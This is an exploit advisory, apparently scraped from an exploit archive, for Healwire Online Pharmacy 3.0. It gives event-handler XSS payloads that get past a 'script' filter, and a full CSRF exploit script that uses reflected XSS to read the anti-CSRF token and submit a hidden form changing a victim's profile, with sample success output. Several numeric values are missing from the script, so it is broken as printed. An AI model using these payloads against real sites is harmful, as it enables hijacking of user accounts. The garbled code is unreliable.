Healwire Online Pharmacy 3.0 Cross Site Request Forgery / Cross Site Scripting

Healwire Online Pharmacy version 3.0 suffers from cross site request forgery and cross site scripting vulnerabilities.

tags | exploit, vulnerability, xss, csrf

MD5 | 9196695291014c0d67db9bdd80d678ff

# Exploit Title: Healwire Online Pharmacy 3.0 - Persistent Cross-Site Scripting / Cross-Site Request Forgery

# Date: --

# Exploit Author: L0RD

# Vendor Homepage: https://codecanyon.net/item/healwire-online-pharmacy/16423338?s_rank=1499

# Version: 3.0

# Tested on: windows

# POC  : Cross site scripting :

) Create an account and go to your profile.

) When we want to put "<script></script>" in the fields,"script" will be

replaced with null.

so we can bypass this filter by using javascript's events like

"onmouseover" or "oninput" .

Put one of these payloads into the fields :

 - " oninput=alert('xss') "

 - " onmouseover=alert('xss') "

) You will get an alert box inside the page . ( after put something into

the fields or move mouse on the fields)

# POC  : Cross-Site request forgery :

# With csrf vulnerability,attacker can easily change user's authentication.

# So in this script , we have anti-CSRF token .We can't change user's

# information without token.

# but there is a vulnerable parameter which has reflected xss in another page

# of this script.

# http://store.webandcrafts.com/demo/healwire/?msg= [We have Reflected XSS here]

# Now we can bypass anti-csrf by this parameter and using javascript:

# Exploit :

"/><form action="

http://store.webandcrafts.com/demo/healwire/user/update-details-user/1"

method="POST">

<input type="hidden" name="first_name" value="a" />

<input type="hidden" name="address"

value="" oninput=alert(document.domain) ""

/>

<input type="hidden" name="pincode" value="a" />

<input type="hidden" name="phone" value="" />

<input type="hidden" name="last_name" value="anything" />

<input type="hidden" name="_token" value="" />

</form>

<script>

var token = ' ';

var req = new XMLHttpRequest();

req.onreadystatechange = function(){

if(this.readyState ==  && this.status == ){

var secPage = this.responseXML;

token = secPage.forms[].elements[].value;

console.log(token);

}

}

req.open("GET","/demo/healwire/account-page",true);

req.responseType = "document";

req.send();

window.setTimeout(function(){

document.forms[].elements[].value = token;

document.forms[].submit();

},)

</script>

# You can also send  ajax requests instead of using form .

# Encode this payload and put this into "msg" parameter

# JSON result after  seconds :

status "SUCCESS"

msg "User profile updated !"

Healwire Online Pharmacy 3.0 Cross Site Request Forgery / Cross Site Scripting的相关教程结束。